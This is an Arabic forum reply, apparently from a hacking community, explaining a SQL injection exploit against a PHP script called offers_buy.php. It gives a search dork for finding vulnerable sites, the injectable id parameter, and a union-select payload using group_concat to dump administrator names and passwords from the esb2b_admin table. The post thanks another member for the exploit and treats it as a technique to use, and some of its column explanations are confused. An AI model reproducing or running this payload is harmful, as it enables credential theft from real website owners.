اسم الملف المصاب
allinurl:offers_buy.php
اسم المتغير
id=9999-
الاستغلال هو
الكتابه ع الماس
+union+all+select+
اما هذا
group_concat(es_admin_name,char(58),es_pwd)
ف Group_concat()
هوا الامر المستخدم للاستعلام عن عمودين او ثلاثه او اكتر اما
es_admin_name,char(58)
فهو جدول اليوزر
اما عمود اليوزر فهو
es_pwd
معنى الاصفر الى فى الاستخدام
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
المفروض انها الاعمدة المصابه
اما هذا
esb2b_admin
فهذا هو الجدول الرئيسى الذى يحوي عمود الباسوردات وعمود اليوزرات
الى هما
es_admin_name
و
es_pwd
اما From
فهذا كود الاستعلام الاولى للجدول حسب شرح الاخ فولكانو فى الدورة
تحياتى وسلمت يمناك على الاستغلال اخى الكريم
05-03-2010, 04:37 AM
العرض المتطور
المواضيع المتشابهه 
